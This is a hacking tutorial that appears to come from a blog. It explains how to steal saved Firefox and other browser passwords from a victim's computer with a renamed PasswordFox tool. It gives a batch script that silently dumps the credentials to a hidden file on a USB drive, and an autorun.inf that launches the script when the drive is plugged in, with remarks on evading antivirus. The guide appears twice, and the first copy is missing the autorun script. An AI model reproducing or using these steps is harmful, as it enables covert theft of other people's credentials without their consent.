How To Steal Saved Passwords From Web Browsers
How To Invincibly Steal Saved Passwords From Firefox
These tools can retrieve saved passwords, history, cache data from any web browser (Chrome, Firefox, Opera, IE or other). You can use these tools without having to install them, this makes it to possible to run these tools on a victim's computer and steal their passwords and any browser data. This is a brief guide on how to use the passwordfox tool to steal Firefox passwords.
1. Download the PasswordFox tool.
2. Create a new folder and extact it.
3. Delete other files extracted in the folder, excluding passwordfox.exe.
4. Rename passwordfox to ps.exe.
5. Now open notepad.
6. Copy this script to notepad.
@echo off
ps.exe /stext tempfile.temp
attrib +S +H tempfile.temp
7. Save it as hijack.bat
8. Now save it inside the folder.
9. Copy the files to a pendrive and run it on the victims computer, run hijack.bat file by double clicking it. It will flash for a brief second and it will save all the web browser passwords to a file inside the pendrive called tempfile.temp (tempfile.temp is created as a hidden system file) You can open this file in notepad and you will see all the passwords in plane text!
You can also add this program to run automatically when the pendrive is plugged in. But from my experience some virus gurds like Avira just blocks autorun files from running. But it may work with other virus guards.
How To Run The Program Through Autorun
1. Open notepad.
2. Copy and paste the script below.
3. Save it as autorun.inf in the pendrive.
4. Copy the ps.exe file and hijack.bat file to the pendrive.
5. Now the program should run automatically when you plug the pendrive in to the victim's computer..
and thats it, Happy hacking!
These tools can retrieve saved passwords, history, cache data from any web browser (Chrome, Firefox, Opera, IE or other). You can use these tools without having to install them, this makes it to possible to run these tools on a victim's computer and steal their passwords and any browser data. This is a brief guide on how to use the passwordfox tool to steal Firefox passwords.
1. Download the PasswordFox tool.
2. Create a new folder and extact it.
3. Delete other files extracted in the folder, excluding passwordfox.exe.
4. Rename passwordfox to ps.exe.
5. Now open notepad.
6. Copy this script to notepad.
@echo off
ps.exe /stext tempfile.temp
attrib +S +H tempfile.temp
7. Save it as hijack.bat
8. Now save it inside the folder.
9. Copy the files to a pendrive and run it on the victims computer, run hijack.bat file by double clicking it. It will flash for a brief second and it will save all the web browser passwords to a file inside the pendrive called tempfile.temp (tempfile.temp is created as a hidden system file) You can open this file in notepad and you will see all the passwords in plane text!
You can also add this program to run automatically when the pendrive is plugged in. But from my experience some virus gurds like Avira just blocks autorun files from running. But it may work with other virus guards.
How To Run The Program Through Autorun
1. Open notepad.
2. Copy and paste the script below.
[autorun]
open=hijack.bat
3. Save it as autorun.inf in the pendrive.
4. Copy the ps.exe file and hijack.bat file to the pendrive.
5. Now the program should run automatically when you plug the pendrive in to the victim's computer..
and thats it, Happy hacking!
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